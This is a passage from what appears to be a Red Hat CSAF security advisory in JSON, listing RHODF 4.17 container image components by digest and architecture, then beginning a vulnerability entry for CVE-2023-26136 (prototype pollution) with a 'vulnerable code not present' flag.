"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64"
},
"product_reference": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Kokorin Vsevolod"
]
}
],
"cve": "CVE-2023-26136",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2023-07-03T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
